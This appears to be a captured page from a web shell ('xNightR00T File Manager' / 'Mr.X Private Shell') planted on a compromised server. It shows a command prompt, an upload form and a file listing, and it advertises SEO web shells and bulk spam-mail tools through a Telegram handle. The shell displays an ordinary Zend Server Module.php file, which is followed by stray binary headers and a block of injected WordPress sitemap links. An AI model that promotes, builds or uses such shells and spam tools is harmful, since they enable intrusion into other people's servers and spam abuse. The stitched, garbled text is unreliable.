xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer;

use ZendServer\License\ChangeListener;
use Zend\EventManager\EventInterface;
use Zend\ModuleManager\Feature\BootstrapListenerInterface;
use ZendServer\Authentication\Adapter\DbTable;
use ZendServer\Authentication\Adapter\Ldap;
use ZendServer\Authentication\Adapter\Azure;
use Zend\ModuleManager\Feature\ServiceProviderInterface;
use Zend\ModuleManager\Feature\AutoloaderProviderInterface as AutoloaderProvider;
use ZendServer\Configuration\Container as ConfigurationContainer;
use Application\Module as appModule;
use ZendServer\Permissions\AclQuery;
use ZendServer\Log\Log;
use Zend\Json\Json;
use Configuration\DdMapper;
use ZendServer\Configuration\Manager;
use Application\Db\TableGateway;
use Application\Db\AbstractFactoryConnector;
use Application\Db\Connector;
use Zend\Crypt\Hash;
use Zend\ModuleManager\Feature\ViewHelperProviderInterface;
use Configuration\PhpVersion;

if (!function_exists('_t')) {
    require_once (__DIR__.DIRECTORY_SEPARATOR.'functions.php'); // require the global convenience functions
}

class Module implements AutoloaderProvider, ServiceProviderInterface, ViewHelperProviderInterface
{

    public function getAutoloaderConfig()
    {
        return array(
            'Zend\Loader\StandardAutoloader' => array(
                'namespaces' => array(
                    __NAMESPACE__ => __DIR__.'/src/'.__NAMESPACE__,
                ),
            ),
        );
    }

    public function getConfig()
    {

        return include __DIR__.'/config/module.config.php';
    }

    public function getViewHelperConfig()
    {
        return array(
            'invokables' => array(
                'ParseMarkdown' => 'ZendServer\View\Helper\ParseMarkdown'
            ),
                    'aliases' => array(
                        'parseMarkdown' => 'ParseMarkdown'
                    )
        );
    }
    /*
     * (non-PHPdoc)
     * @see \Zend\ModuleManager\Feature\ServiceProviderInterface::getServiceConfig()
     */

    public function getServiceConfig()
    {
        $module = $this;
        return array(
            'aliases' => array(
                'AuthAdapterLdap' => 'ZendServer\Authentication\Adapter\Ldap',
                'AuthAdapterAzure' => 'ZendServer\Authentication\Adapter\Azure',
                'AuthAdapterZrayStandalone' => 'ZendServer\Authentication\Adapter\ZrayStandalone',
                'AuthAdapterDbTable' => 'ZendServer\Authentication\Adapter\DbTable',
                'ZendServerAcl' => 'ZendServer\Permissions\AclQuery',
            ),
            'invokables' => array(
            ),
            'factories' => array(
                'ZendServer\Permissions\AclQuery' => function($sm) {
                    $acl = new AclQuery();
                    if ($sm->has('ZendServerIdentityAcl')) {
                        $acl->setAcl($sm->get('ZendServerIdentityAcl'));
                    }
                    if ($sm->has('ZendServerLicenseAcl')) {
                        $acl->setEditionAcl($sm->get('ZendServerLicenseAcl'));
                    }
                    return $acl;
                },
                'ViewManager' => 'ZendServer\Mvc\Service\ViewManagerFactory',
                'ZendServer\Configuration\Container' => function($sm) {
                    $adapter = new ConfigurationContainer();
                    $adapter->setDirectivesMapper($sm->get('Configuration\MapperDirectives'));
                    $adapter->setExtensionsMapper($sm->get('Configuration\MapperExtensions'));
                    $adapter->setLibrariesMapper($sm->get('DeploymentLibrary\Mapper'));
                    if (isZrayStandaloneEnv()) {
                        $zeMapFile = getCfgVar('zend.conf_dir').DIRECTORY_SEPARATOR.'zend_extensions_map.json';
                    } else {
                        $zeMapFile = getCfgVar('zend.install_dir').DIRECTORY_SEPARATOR.'share/zend_extensions_map.json';
                            if(!file_exists($zeMapFile)){
                           $zeMapFile = getCfgVar('zend.install_dir').DIRECTORY_SEPARATOR.'php'
                                .DIRECTORY_SEPARATOR.
                                $sm->get(PhpVersion::class)->getCurrentVersion()
                                .DIRECTORY_SEPARATOR.'share'.DIRECTORY_SEPARATOR.'zend_extensions_map.json';
                        }
                    }
                    $content = @file_get_contents($zeMapFile, Json::TYPE_OBJECT);
                    if ($content !== false) {
                        $adapter->setDdMapper(new DdMapper($content));
                    } else {
                        Log::warn(_t('Cannot file the file share/zend_extensions_map.json'));
                    }
                    $adapter->setManager(new Manager());
                    return $adapter;
                },
                'ZendServer\Authentication\Adapter\Ldap' => function($sm) {
                    $adapter = new Ldap(array('zend_server_authentication' => appModule::config('zend_server_authentication')->toArray()));
                    $adapter->setMapperGroups($sm->get('Acl\Db\MapperGroups'));
                    $adapter->setGroupsAttribute(appModule::config('authentication', 'groupsAttribute'));
                    return $adapter;
                },
                'ZendServer\Authentication\Adapter\Azure' => function($sm) {
                    $adapter = new Azure(array('zend_server_authentication' => appModule::config('zend_server_authentication')->toArray()));
                    return $adapter;
                },
                'ZendServer\Authentication\Adapter\DbTable' => function($sm) {
                    $dbAdapter = $sm->get(Connector::DB_CONTEXT_GUI);
                    $adapter   = new DbTable($dbAdapter, 'GUI_USERS', 'NAME', 'PASSWORD',
                        function($dbCreds, $userCreds) {
                            return $dbCreds === Hash::compute('sha256', $userCreds);
                        });
                    return $adapter;
                },
                'ZendServer\Filter\Mapper' => function($sm) {
                    $mapper = new \ZendServer\Filter\Mapper(new TableGateway('GUI_FILTERS',
                        $sm->get(Connector::DB_CONTEXT_GUI)));
                    return $mapper;
                },
                'ZendServer\Http\RequestsUtils' => function($sm) {
                    $requestsUtils = new \ZendServer\Http\RequestsUtils();
                    $requestsUtils->setWebAPIKeyMapper($sm->get('WebAPI\Db\Mapper'));

                    return $requestsUtils;
                }
            )
        );
    }
}

Filemanager

Name Type Size Permission Actions
config Folder 0755
public Folder 0755
src Folder 0755
tests Folder 0755
views Folder 0755
Module.php File 6.45 KB 0644
functions.php File 373 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml